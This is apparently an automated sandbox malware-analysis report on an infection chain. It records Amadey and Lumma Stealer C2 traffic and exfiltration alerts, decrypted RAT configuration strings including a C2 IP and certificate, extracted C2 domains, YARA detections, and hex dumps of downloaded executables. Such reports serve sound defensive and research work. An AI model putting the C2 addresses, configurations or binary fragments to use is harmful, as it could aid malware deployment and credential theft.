Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: null
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Default
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 7707
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 159.100.19.137
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: 0.5.8
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: yBu0GW2G5zAc
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: null
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: false
Source: 57.2.Macromedia.com.40c24a8.2.unpack	String decryptor: Default

Phishing

Yara detected Healer AV Disabler

Source: Yara match

File source: Process Memory Space: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE PID: 1436, type: MEMORYSTR

Yara detected obfuscated html page

Source: Yara match	File source: C:\Temp\v468GkyBl.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\i2GY6vn5L.hta, type: DROPPED

Uses 32bit PE files

Source: DhqvS8pXj8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F868EE FindFirstFileW,FindClose,	8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406301 FindFirstFileW,FindClose,	30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	30_2_00406CC7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49760 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49784 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49913 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.4:56194 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49950 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49972 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49980 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49981 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49995 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50019 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50041 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.4:52437 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50064 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.2.4:50069
Source: Network traffic	Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:49474 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.4:64582 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.4:61311 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.4:61066 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.4:57082 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.4:49980 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.4:58531 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50070 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:50073 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50076 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50072 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50079 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49927 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50071 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.0.135:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pleasedcfrown.biz
Source: Malware configuration extractor	URLs: affordtempyo.biz
Source: Malware configuration extractor	URLs: mixedrecipew.biz
Source: Malware configuration extractor	URLs: hoursuhouy.biz
Source: Malware configuration extractor	URLs: suggestyuoz.biz
Source: Malware configuration extractor	URLs: lightdeerysua.biz
Source: Malware configuration extractor	URLs: toppyneedus.biz
Source: Malware configuration extractor	URLs: impolitewearr.biz
Source: Malware configuration extractor	URLs: edcatiofireeu.shop
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: wodresomdaymomentum.org
Source: Malware configuration extractor	URLs: wodresomdaymomentum.org

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:07 GMTContent-Type: application/octet-streamContent-Length: 2399744Last-Modified: Tue, 11 Feb 2025 14:56:33 GMTConnection: keep-aliveETag: "67ab6521-249e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 21 8e ab 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 94 24 00 00 08 00 00 00 00 00 00 0a b3 24 00 00 20 00 00 00 c0 24 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 25 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 b2 24 00 4a 00 00 00 00 c0 24 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 24 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 93 24 00 00 20 00 00 00 94 24 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9e 05 00 00 00 c0 24 00 00 06 00 00 00 96 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 24 00 00 02 00 00 00 9c 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 b2 24 00 00 00 00 00 48 00 00 00 02 00 05 00 6c 35 01 00 bc 1c 02 00 03 00 00 00 ae 06 00 06 28 52 03 00 98 60 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 28 ee 06 00 06 28 b9 06 00 06 2a 56 72 01 00 00 70 80 01 00 00 04 72 5b 00 00 70 80 02 00 00 04 2a 00 00 1e 02 28 33 00 00 0a 2a de 7e 03 00 00 04 2d 15 72 8d 00 00 70 d0 03 00 00 02 2b 0f 2b 14 2b 19 80 03 00 00 04 7e 03 00 00 04 2a 28 34 00 00 0a 2b ea 6f 35 00 00 0a 2b e5 73 36 00 00 0a 2b e0 1a 7e 04 00 00 04 2a 00 2e 2b 06 80 04 00 00 04 2a 02 2b f7 8a 2b 12 72 c3 00 00 70 7e 04 00 00 04 2b 0d 74 3f 00 00 1b 2a 28 04 00 00 06 2b e7 6f 37 00 00 0a 2b ec 00 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 5e 02 28 38 00 00 0a 02 17 8d 4b 00 00 01 25 16 03 9c 7d 05 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 05 00 00 04 2a 00 3a 02 28 38 00 00 0a 02 03 7d 06 00 00 04 2a 00 5e 02 28 38 00 00 0a 02 17 8d 4c 00 00 01 25 16 03 a2 7d 07 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 07 00 00 04 2a 00 2e 2b 06 7b 07 00 00 04 2a 02 2b f7 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 1e 02 28 33 00 00 0a 2a f2 02 28 33 00 00 0a 02 03 28 8f 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:11 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Tue, 11 Feb 2025 17:08:45 GMTConnection: keep-aliveETag: "67ab841d-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed 